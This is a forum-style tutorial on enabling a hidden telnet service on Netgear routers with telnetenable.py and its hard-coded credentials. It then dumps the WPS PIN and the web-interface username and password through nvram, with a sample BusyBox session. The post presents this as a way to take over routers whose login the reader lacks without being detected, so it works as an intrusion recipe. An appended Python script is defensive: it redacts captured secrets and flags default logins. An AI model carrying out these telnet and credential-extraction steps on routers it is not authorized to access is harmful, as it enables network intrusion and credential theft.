One can access a Netgear router's configuration page with a browser and the default admin-password login combination. When this information is not available, the router can be reset with a paperclip, but all settings will be lost, and you risk being detected.

A better solution is to use telnet. Most Netgear routers include a telnet service. It is disabled by default, but it can be enabled remotely as long as you are connected to the AP. Download the Python script and execute it as follows, making sure to substitute the router's local IP address, and to enter the router's MAC address in all capital letters:

    python telnetenable.py 192.168.1.1 MACADDRESS Gearguy Geardog

Now you can telnet into the router (with this command: telnet 192.168.1.1) and do all kinds of neat things.

Below is the output for a WNR1000v3. As you can see, the router is running BusyBox. The routerinfo command gives a quick overview and also displays the WPS PIN. Not all models have the routerinfo command. In that case, press tab to see a list of installed commands, or type busybox.

The nvram command allows you to access (and perhaps change) all the settings that are stored in the device's non-volatile memory. Some models use config instead of nvram, but it does the same thing. In order to fully pwn a router for which you do not have the login credentials, you can use the nvram get http_ commands as shown below. That's how you can quickly get the name and password for the web interface.

Code:

    Trying 192.168.1.1...
    Connected to 192.168.1.1.
    Escape character is '^]'.
    BusyBox v0.60.0 (2010.12.01-12:13+0000) Built-in shell (msh)
    Enter 'help' for a list of built-in commands.
    # routerinfo
    Release version : Netgear Wireless Router WNR1000v3 U12H13900/V1.0.2.28/52.0.60NA
    Time : Dec 1 2010 20:19:46
    CFE version : 3.0.6
    WSC PIN - XXXXXXXX
    LAN mac address - 204E7FXXXXXX
    WAN mac address - 204E7FXXXXXX
    WLAN mac address - 204E7FXXXXXX
    Board ID - U12H139T50_NETGEAR
    serial number - XXXXXXXXXXXXX
    # nvram get http_username
    XXXXXXXX
    # nvram get http_passwd
    XXXXXXXX

The nvram show command shows all variables, including hidden ones that are not available on the web interface. The ls -l command shows you all the files on the router, which is nothing but a small computer. Don't forget to look inside the www directory for hidden pages. Have fun exploring the inner workings of your router.
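An added example, not part of the original post: Python code for auditing a session capture like the one above from your own router. It parses the routerinfo and nvram get output, masks the values the post replaced with X (WPS PIN, serial number, the device half of each MAC address, the web login) so the capture can be shared, and reports whether the web interface still uses the default admin/password login. The function names and all sample values are assumptions made for this example.

```python
import re

# Constructed session in the layout of the WNR1000v3 output above; all values are made up.
SAMPLE = """\
# routerinfo
Release version : Netgear Wireless Router WNR1000v3 U12H13900/V1.0.2.28/52.0.60NA
WSC PIN - 12345670
LAN mac address - 204E7F0A0B0C
serial number - 1AB2345C67890
# nvram get http_username
admin
# nvram get http_passwd
password
"""

FIELD = re.compile(r"^(\s*)([^:\-]+?)(\s+[:-]\s+)(.*)$")  # "key : value" or "key - value"
SECRET_FIELDS = {"WSC PIN", "serial number"}              # masked in full
DEFAULT_WEB_LOGIN = ("admin", "password")                 # default pair named in the post

def mask(value, keep=0):
    # Replace everything after the first `keep` characters with X.
    return value[:keep] + "X" * (len(value) - keep)

def process(session):
    """Return (routerinfo fields, nvram values, redacted transcript)."""
    fields, nvram, out, pending = {}, {}, [], None
    for line in session.splitlines():
        if line.startswith("# "):                         # shell prompt plus command
            cmd = line[2:].split()
            pending = cmd[2] if len(cmd) == 3 and cmd[:2] == ["nvram", "get"] else None
        elif pending is not None:                         # reply to `nvram get <name>`
            nvram[pending] = line.strip()
            line, pending = mask(line.strip()), None
        elif (m := FIELD.match(line)):
            indent, key, sep, value = m.groups()
            fields[key] = value
            if key in SECRET_FIELDS:
                value = mask(value)
            elif key.endswith("mac address"):
                value = mask(value, keep=6)               # keep the vendor prefix, as the post does
            line = indent + key + sep + value
        out.append(line)
    return fields, nvram, "\n".join(out)

def findings(fields, nvram):
    """Issues worth fixing on the audited router."""
    issues = []
    if (nvram.get("http_username"), nvram.get("http_passwd")) == DEFAULT_WEB_LOGIN:
        issues.append("web interface still uses the default login")
    if fields.get("WSC PIN"):
        issues.append("WPS PIN readable over telnet; treat it as disclosed")
    return issues
```

Call `process()` on the saved session text and share only the third return value; `findings()` takes the first two.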